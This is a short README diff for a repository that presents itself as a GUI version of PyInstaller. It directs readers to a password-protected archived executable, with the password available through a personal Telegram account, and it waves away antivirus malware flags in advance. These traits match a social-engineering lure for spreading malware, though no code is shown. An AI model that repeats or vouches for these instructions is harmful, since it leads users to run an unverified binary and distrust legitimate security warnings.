marik22354/Pyinstaller-GUI-Version/README.md

 To start the GUI mode, run on terminal Pyinstaller.exe -GUI To run the Command mode, run on terminal Pyinstaller.exe --onefile yourfile.py.
 By typing Pyinstaller.exe --help, you will get a verbose output of all commands, including UPX, custom icon and UAC-admin template.

 The file is stored in a .zip archive made with 7zip.
 To extract you need 7z or WinRar, otherwise it crashes.
-To retrieve password, reply to this repo on "Issue", to gain visibility and popularity.
-Also forking the project would be a good idea.
+To retrieve password, reply on my Telegram: @crazy_coder1996

 *Please note, some very stupid idiots used Pyinstaller to compile virus, resulting in the app being flagged as generic malware, test it on a virtual machine if you don't trust the repository*